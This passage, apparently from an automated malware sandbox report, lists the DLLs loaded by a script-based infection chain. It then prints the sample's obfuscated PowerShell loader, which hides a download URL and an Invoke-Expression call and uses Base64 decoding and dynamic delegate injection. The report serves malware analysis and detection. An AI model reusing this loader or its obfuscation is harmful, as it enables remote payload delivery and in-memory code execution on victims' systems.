Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2477154181.00000000079A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2477154181.00000000079CC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000004.00000002.2447632950.00000000033DE000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Offentlighedslovgivninger Raakremer", "", "", "0");
Source: Yara match File source: 00000004.00000002.2487017781.000000000AA58000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2486808594.0000000008E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2468395369.000000000609A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Biplosive165)$GLobAL:sKAffernE = [sYstem.TExt.eNCodING]::AsCiI.geTsTRing($KvaNtITeTsMssIGe)$gLOBAl:REndestenEN=$skafFernE.suBsTriNG($pREFerTilIzAtioN,$wAVenUmBEr1)<#ledtogenes Gratta
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Humoristics $Corynteria $Pluralise), (Dydsiret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Antibromic = [AppDomain]::CurrentDomain.GetAssemblies()$glob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Hubbell159)), $yuckiest).DefineDynamicModule($Endrin, $false).DefineType($Effusive, $Theatricalization91, [System.MulticastDelegate])$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Biplosive165)$GLobAL:sKAffernE = [sYstem.TExt.eNCodING]::AsCiI.geTsTRing($KvaNtITeTsMssIGe)$gLOBAl:REndestenEN=$skafFernE.suBsTriNG($pREFerTilIzAtioN,$wAVenUmBEr1)<#ledtogenes Gratta
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ 